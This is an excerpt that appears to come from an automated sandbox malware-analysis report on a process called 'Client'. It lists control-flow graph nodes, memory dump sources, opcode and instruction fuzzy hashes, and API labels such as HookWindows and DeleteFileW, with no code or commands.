                                          control_flow_graph 1038 7ffd9baf9271-7ffd9baf9295 1039 7ffd9baf9297-7ffd9baf92bc 1038->1039 1040 7ffd9baf92df-7ffd9baf92e2 1038->1040 1041 7ffd9baf92d0-7ffd9baf92de 1039->1041 1042 7ffd9baf92be-7ffd9baf92ce 1039->1042 1041->1040 1042->1041 1044 7ffd9baf92e3-7ffd9baf9314 1042->1044 1047 7ffd9baf9316-7ffd9baf9335 call 7ffd9baf3950 1044->1047 1048 7ffd9baf9363-7ffd9baf9388 call 7ffd9baf7e00 1044->1048 1047->1048 1053 7ffd9baf9337-7ffd9baf9357 call 7ffd9baf3830 1047->1053 1054 7ffd9baf95f2-7ffd9baf9605 call 7ffd9baf8d80 1048->1054 1055 7ffd9baf938e-7ffd9baf939c call 7ffd9baf4e50 1048->1055 1053->1048 1066 7ffd9baf9359-7ffd9baf9360 1053->1066 1064 7ffd9baf9607-7ffd9baf9628 1054->1064 1065 7ffd9baf9632-7ffd9baf9634 1054->1065 1062 7ffd9baf93b6-7ffd9baf93b9 1055->1062 1063 7ffd9baf939e-7ffd9baf93b2 1055->1063 1067 7ffd9baf9583-7ffd9baf958e 1062->1067 1068 7ffd9baf93bf-7ffd9baf93c2 1062->1068 1063->1062 1064->1065 1080 7ffd9baf962a-7ffd9baf962f 1064->1080 1069 7ffd9baf9636-7ffd9baf963a 1065->1069 1070 7ffd9baf9643-7ffd9baf96c6 1065->1070 1066->1048 1073 7ffd9baf95c5-7ffd9baf95d0 1067->1073 1072 7ffd9baf93c8 1068->1072 1068->1073 1069->1070 1076 7ffd9baf963c-7ffd9baf963e 1069->1076 1085 7ffd9baf96ce-7ffd9baf96cf 1070->1085 1072->1054 1073->1054 1077 7ffd9baf96d5-7ffd9baf96d8 1076->1077 1081 7ffd9baf9ac7-7ffd9baf9ada 1077->1081 1082 7ffd9baf96de-7ffd9baf9751 call 7ffd9baf8060 1077->1082 1080->1065 1092 7ffd9baf9776 1082->1092 1093 7ffd9baf9753-7ffd9baf9774 1082->1093 1085->1077 1094 7ffd9baf9778-7ffd9baf978b 1092->1094 1093->1092 1093->1094 1097 7ffd9baf97bb-7ffd9baf97f4 1094->1097 1098 7ffd9baf978d-7ffd9baf97b6 1094->1098 1104 7ffd9baf97f6-7ffd9baf97f7 1097->1104 1105 7ffd9baf97fe-7ffd9baf982a 1097->1105 1103 7ffd9baf9870-7ffd9baf9877 1098->1103 1106 7ffd9baf9879-7ffd9baf9885 1103->1106 1107 7ffd9baf9893-7ffd9baf98f4 1103->1107 1104->1105 1105->1103 1113 7ffd9baf982c-7ffd9baf9860 1105->1113 1106->1107 1109 7ffd9baf9887-7ffd9baf988c 1106->1109 1116 7ffd9baf98f6-7ffd9baf990b 1107->1116 1117 7ffd9baf9915-7ffd9baf9937 1107->1117 1109->1107 1113->1103 1123 7ffd9baf9862-7ffd9baf9869 1113->1123 1116->1117 1121 7ffd9baf9939-7ffd9baf9945 1117->1121 1122 7ffd9baf9953-7ffd9baf9954 1117->1122 1125 7ffd9baf994d-7ffd9baf9951 1121->1125 1124 7ffd9baf9956-7ffd9baf9971 1122->1124 1123->1103 1124->1081 1127 7ffd9baf9977-7ffd9baf998d call 7ffd9baf8d80 1124->1127 1125->1124 1127->1081 1130 7ffd9baf9993-7ffd9baf99b4 1127->1130 1132 7ffd9baf99b6-7ffd9baf99e4 1130->1132 1133 7ffd9baf9a01-7ffd9baf9a22 1130->1133 1132->1133 1139 7ffd9baf99e6-7ffd9baf99fc 1132->1139 1137 7ffd9baf9a64-7ffd9baf9a85 1133->1137 1138 7ffd9baf9a24-7ffd9baf9a56 1133->1138 1137->1081 1145 7ffd9baf9a87-7ffd9baf9ab9 1137->1145 1138->1137 1144 7ffd9baf9a58-7ffd9baf9a61 1138->1144 1139->1081 1144->1137 1145->1081 1149 7ffd9baf9abb-7ffd9baf9ac4 1145->1149 1149->1081
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4136288347.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_7ffd9baf0000_Client.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 80d17e5c33e2532366ea88590e31e3e0dabddeca29144358f4a7fb45437f8bc8
                                          • Instruction ID: 360cae185c80d721195809ecd7bd515d4229391b4063e10f67328a87ee12e1c1
                                          • Opcode Fuzzy Hash: 80d17e5c33e2532366ea88590e31e3e0dabddeca29144358f4a7fb45437f8bc8
                                          • Instruction Fuzzy Hash: 10228130B19A0D4FEBA8EB5984A57B977E2FF98300F15417DD44EC32A2DE74E9428781
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4136288347.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_7ffd9baf0000_Client.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 128e2143cc7dd0aa872da90493c352b8e3bb25acf92520bff42bb04e84fe0c5f
                                          • Instruction ID: fb5eb1134c0e49c06c6756098afe9f22722f72d638427326844460390fa8c3e3
                                          • Opcode Fuzzy Hash: 128e2143cc7dd0aa872da90493c352b8e3bb25acf92520bff42bb04e84fe0c5f
                                          • Instruction Fuzzy Hash: 07025C30F18A198FEBA8EF58C4947A9B7E1FF98301F1541BDD44ED32A5DA74A981CB40

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4136288347.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_7ffd9baf0000_Client.jbxd
                                          Similarity
                                          • API ID: HookWindows
                                          • String ID:
                                          • API String ID: 2559412058-0
                                          • Opcode ID: 2755db64837726e5bf819cec9b2ade66ce5ce291c263a87cb53f50f3f8354593
                                          • Instruction ID: 1bc7b5818f8605091994d2ec80cf7392d07ef81237b24ce5d859549fc0ee133f
                                          • Opcode Fuzzy Hash: 2755db64837726e5bf819cec9b2ade66ce5ce291c263a87cb53f50f3f8354593
                                          • Instruction Fuzzy Hash: 81710531B1DB4D4FDB58AB6C98665F97BE1EF59310B0441BFE04DC3296DE24A80287C2

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 458 7ffd9b883535-7ffd9b88353f 459 7ffd9b883581-7ffd9b8835e8 458->459 460 7ffd9b883541-7ffd9b883572 458->460 466 7ffd9b8835f2-7ffd9b883624 DeleteFileW 459->466 467 7ffd9b8835ea-7ffd9b8835ef 459->467 460->459 468 7ffd9b88362c-7ffd9b88365a 466->468 469 7ffd9b883626 466->469 467->466 469->468
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4133957540.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_7ffd9b880000_Client.jbxd
                                          Similarity
                                          • API ID: DeleteFile
                                          • String ID:
                                          • API String ID: 4033686569-0
                                          • Opcode ID: 8496314d5b8a560dc44c5b108a1287dd0930cdb068d7a2aeb5cfb9b0b8b9f969
                                          • Instruction ID: f2d03300419cc09d4082ad3eaaa4b2cc54a82204299cc55598dd089d169630f6
                                          • Opcode Fuzzy Hash: 8496314d5b8a560dc44c5b108a1287dd0930cdb068d7a2aeb5cfb9b0b8b9f969
                                          • Instruction Fuzzy Hash: 6E41247190DB9C8FDB59DB6888596E97FF0FF5A310F0442AFD049D71A2DA34A8068781

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 522 7ffd9b883579-7ffd9b8835e8 527 7ffd9b8835f2-7ffd9b883624 DeleteFileW 522->527 528 7ffd9b8835ea-7ffd9b8835ef 522->528 529 7ffd9b88362c-7ffd9b88365a 527->529 530 7ffd9b883626 527->530 528->527 530->529
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4133957540.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_7ffd9b880000_Client.jbxd
                                          Similarity
                                          • API ID: DeleteFile
                                          • String ID:
                                          • API String ID: 4033686569-0
                                          • Opcode ID: 53a9bcf52d8332d1f1e9dc90049fe8628c09b4df14d9379ac8895e2ff0a8c813
                                          • Instruction ID: cc5bc714e2c75b9ee3c4cff93ffcda58733c9fc3ad056204d626d7c4aea7df5d
                                          • Opcode Fuzzy Hash: 53a9bcf52d8332d1f1e9dc90049fe8628c09b4df14d9379ac8895e2ff0a8c813
                                          • Instruction Fuzzy Hash: 6531C17190CB5C8FDB59DB589859AF9BBF0FF66320F04426BD049D3292DB34A8068B81
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.1734096551.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_7ffd9b8a0000_Client.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ;M_I
                                          • API String ID: 0-1276053120
                                          • Opcode ID: 0ed06fe978148e2d12897fb704197863ec981b6554fdbaef4e300a302ed3bd8f
                                          • Instruction ID: 2ea911b66e66864984c78f154f2b8d9d67a8ba85718d4aa9ce488514b0f6c3b0
                                          • Opcode Fuzzy Hash: 0ed06fe978148e2d12897fb704197863ec981b6554fdbaef4e300a302ed3bd8f
                                          • Instruction Fuzzy Hash: D3A1706170FAC94FE319E76C58B52A47BA1EF4A304F8441F7E48C472EBE939A902C351
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.1734096551.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_7ffd9b8a0000_Client.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .M_^
                                          • API String ID: 0-2820351210
                                          • Opcode ID: aa0d126493cf0f053e34a9027afbb52a42b690956445fc53fdb36dbf16223b41
                                          • Instruction ID: ecaa4dc56e9bfdce89e937901a525eac32bced0ca9365b6582dbb6da47183a4c
                                          • Opcode Fuzzy Hash: aa0d126493cf0f053e34a9027afbb52a42b690956445fc53fdb36dbf16223b41
                                          • Instruction Fuzzy Hash: B621921270FA9D0FD756A76DAC655E47BD0EF9BA2170902FBC098CB1A3DC0869068361
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.1734096551.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_7ffd9b8a0000_Client.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4f4113ecb91efa8cd0de6f8e409ca4c6cb6356b2fd48c55c060b34d47df2e441
                                          • Instruction ID: 31768d3842e962d10cb3be6bb5b7719b0eb62a119b0130780a03d8773eaaa2aa
                                          • Opcode Fuzzy Hash: 4f4113ecb91efa8cd0de6f8e409ca4c6cb6356b2fd48c55c060b34d47df2e441
                                          • Instruction Fuzzy Hash: 0EA10921B1A98E0FEBA9FB6884757F877D2EF99350F0501BAD44DC71E7DD28A9028350
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.1734096551.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_7ffd9b8a0000_Client.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4cd17b46d152e7cdc052714f83b40ea84c9cbd0b1132f14015bb03819596d59b
                                          • Instruction ID: a726733ff1d98f11028d2c93e0882dfc31886964178643e9f19a24fe58154bc2
                                          • Opcode Fuzzy Hash: 4cd17b46d152e7cdc052714f83b40ea84c9cbd0b1132f14015bb03819596d59b
                                          • Instruction Fuzzy Hash: 6B719021F1890D4FDBA8EBA884657BCB7E2EF9C310F450179E41ED32D6DE28AC428750
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.1734096551.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_7ffd9b8a0000_Client.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ac04df9de854856ed8860ac5b28217904ec1665139581683c6e57ac11651f5ef
                                          • Instruction ID: d1dfede2355898780ee3bdf71258eaf305097664ea18b186536f516d29e973f6
                                          • Opcode Fuzzy Hash: ac04df9de854856ed8860ac5b28217904ec1665139581683c6e57ac11651f5ef
                                          • Instruction Fuzzy Hash: 4C51AF10B0E95A0BEBA9F7B844757AA6AD3EB8F25078580B5D009C72DBDD3C9943C391
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.1734096551.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_7ffd9b8a0000_Client.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0d5eae4da01af7e186ce1874b3774a070889fc435487232dcec6fc6ff7025ce3
                                          • Instruction ID: 5c24a6fb30b64e6b7132527eceb67bdfbf01f348febc0ec2abc8fb7a9b912cef
                                          • Opcode Fuzzy Hash: 0d5eae4da01af7e186ce1874b3774a070889fc435487232dcec6fc6ff7025ce3
                                          • Instruction Fuzzy Hash: B541E821B0E68D0FEBA5FBA84475AF97BA1EF59310F0600BAD04DC72D7DD18AD018751
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.1734096551.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_7ffd9b8a0000_Client.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1205171d1930d9a9841826345b9fdb4bf458ac55a51b5267c09b382f5fe69653
                                          • Instruction ID: ccb8b598da55d7c3502bd6f32d9696c01d0e39f8c41e60c134f5996ebc25f5dd
                                          • Opcode Fuzzy Hash: 1205171d1930d9a9841826345b9fdb4bf458ac55a51b5267c09b382f5fe69653
                                          • Instruction Fuzzy Hash: 9F412B21B1DA494FE76CABAC94267B977D1EF99314F04017EF05EC32D6DD2C69028392
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.1734096551.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_7ffd9b8a0000_Client.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2dea0984fdb110dd87788cbe113fb271fb45cf2658aeb47b118f6261b4508f96
                                          • Instruction ID: 72f54bf3eef6f9753fca8c702f147d1ee474db0173fa58ae0a1ae74b08f6a9c4
                                          • Opcode Fuzzy Hash: 2dea0984fdb110dd87788cbe113fb271fb45cf2658aeb47b118f6261b4508f96
                                          • Instruction Fuzzy Hash: 1621F716F0F56D1BE755F7ACB8E99F97790DF5A22970402F3D09CCA1A3EC0824878250
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.1734096551.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_7ffd9b8a0000_Client.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 29b55896dc2bae9ba1e04d3161370b94d2ee28c1a15e6ce4b7487e3b7c580d09
                                          • Instruction ID: bcef832e1ce3a15a7edae2c759c73f50c8b1bd3d800d0713dff5b9f862de4f88
                                          • Opcode Fuzzy Hash: 29b55896dc2bae9ba1e04d3161370b94d2ee28c1a15e6ce4b7487e3b7c580d09
                                          • Instruction Fuzzy Hash: 31217C31A0E54A4FDB55EF68C0E55A57B91EF5A310B1942F9C048CF1FBD928ED86C390
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.1734096551.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_7ffd9b8a0000_Client.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8f24fba203d2e419fadaad4e0f09514b8d457bdb716cf59cf0f63739f9fdb9f2
                                          • Instruction ID: 8fef723cc3a0354f93ea677ca5a63f408da166b9d0e84ca67ff289429b97e810
                                          • Opcode Fuzzy Hash: 8f24fba203d2e419fadaad4e0f09514b8d457bdb716cf59cf0f63739f9fdb9f2
                                          • Instruction Fuzzy Hash: 7D31E730749A494FE34CF71C94A57E57B62EB8E308FC08195E819433CBDA7D6581CB62
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.1734096551.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_7ffd9b8a0000_Client.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b9ac79ae2666bb6222858543f866e65836b8b79a163b870a40cd863ad3f5ea26
                                          • Instruction ID: 96e9b2b556672b2ea29de307da17b0891ebd877d1c0b513ee196447db0c137ea
                                          • Opcode Fuzzy Hash: b9ac79ae2666bb6222858543f866e65836b8b79a163b870a40cd863ad3f5ea26
                                          • Instruction Fuzzy Hash: ED21C131F19A594FD794FB689869AB873E1EF59305B0100BAE00DC32A6DE28E840C741
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.1734096551.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_7ffd9b8a0000_Client.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 98e6d50ceae39fe427ad9ef342047d14c71f4347c5c6c98ba97fc174c6a5411a
                                          • Instruction ID: 9b118e1de62e8a321a02616c3bd9ee5f61eeebaae1287a4822bb9baad1246a19
                                          • Opcode Fuzzy Hash: 98e6d50ceae39fe427ad9ef342047d14c71f4347c5c6c98ba97fc174c6a5411a
                                          • Instruction Fuzzy Hash: E321F991A2EAC64FF359A7744C75AA4ABA1FF55780F0901FAC09DCB1E7DD1C290483A2
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.1734096551.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_7ffd9b8a0000_Client.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 476a5b011c8af58bd4013ca78c9358a586a98c129b66234c7209a1d20c26a3cb
                                          • Instruction ID: f4d247c7a40bedea8828c1d09f0da4b339bcd54073fa449a0189a30a5b5dec2f
                                          • Opcode Fuzzy Hash: 476a5b011c8af58bd4013ca78c9358a586a98c129b66234c7209a1d20c26a3cb
                                          • Instruction Fuzzy Hash: FB119921A0EA850FE366A73858A98F17BD4DBA822070901BBE44DC31A3DD1CAA868351
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.1734096551.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_7ffd9b8a0000_Client.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1bfc882b5e87b2b68e85d372255d82e9e02131c52323054c82996e7120b1ab34
                                          • Instruction ID: d6f7fc5db895ad92fe598471be8674e5f8405974c4064867a4ff3673ce17fbc0
                                          • Opcode Fuzzy Hash: 1bfc882b5e87b2b68e85d372255d82e9e02131c52323054c82996e7120b1ab34
                                          • Instruction Fuzzy Hash: 6D11E911B4EBC84FE397E37858A8AB47FD1AF8B214B1A41F7E488CB1B7C9584945C312
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.1734096551.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_7ffd9b8a0000_Client.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e87ede69a3c528f1e53b57c1a803af8c49b4696affeb6b47c9ff94394ea0c27e
                                          • Instruction ID: e518ff37af8622999ad1050f124319fb0b59491a6a9c5cacd65f9d1f98bd9c8e
                                          • Opcode Fuzzy Hash: e87ede69a3c528f1e53b57c1a803af8c49b4696affeb6b47c9ff94394ea0c27e
                                          • Instruction Fuzzy Hash: E3014E1377AD4E0AD7ADB26C58A55F563D2DB99750B0406B6E00DC31AAED1879424381
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.1734096551.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_7ffd9b8a0000_Client.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 756d673eb3e4c4ad02329b87d18cc3474f3cdc8f251f49ebda440b41943cacf9
                                          • Instruction ID: 1028b123e5146edb0504ca59d586461faf71552001ddde5ced65df480448ad0e
                                          • Opcode Fuzzy Hash: 756d673eb3e4c4ad02329b87d18cc3474f3cdc8f251f49ebda440b41943cacf9
                                          • Instruction Fuzzy Hash: 5CF02422B09C6C0FE758F2AD58E8EF967D0DF9C22971502B7E04CC72A7DC0498828391
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.1734096551.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_7ffd9b8a0000_Client.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 83814c5acf9fe11d4b9fc42a33ac74f7f15e4df0611d8db6ae79e359cda175c4
                                          • Instruction ID: cc68ee032803a045a66e5c09eedd4522be782574a0d64bb94c4f877acfef1a2e
                                          • Opcode Fuzzy Hash: 83814c5acf9fe11d4b9fc42a33ac74f7f15e4df0611d8db6ae79e359cda175c4
                                          • Instruction Fuzzy Hash: 65E09221B19C1D1FEBA8F7AD48D9F7962D1EBAC21572501B6E40CC72AADC189C818351
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.1734096551.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_7ffd9b8a0000_Client.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1aa5a05d1b6f916826d1460ec26c22a2b03d531ad38cea497fd28afd445c3b06
                                          • Instruction ID: 764722d630f8f749ef3e6821ee5508f13290d17a59191fbbaca760725bb5696f
                                          • Opcode Fuzzy Hash: 1aa5a05d1b6f916826d1460ec26c22a2b03d531ad38cea497fd28afd445c3b06
                                          • Instruction Fuzzy Hash: FAE04F22F1A91A0AE695326824621FC31819F58A51B46157AE84DC62E7DC1D6D420294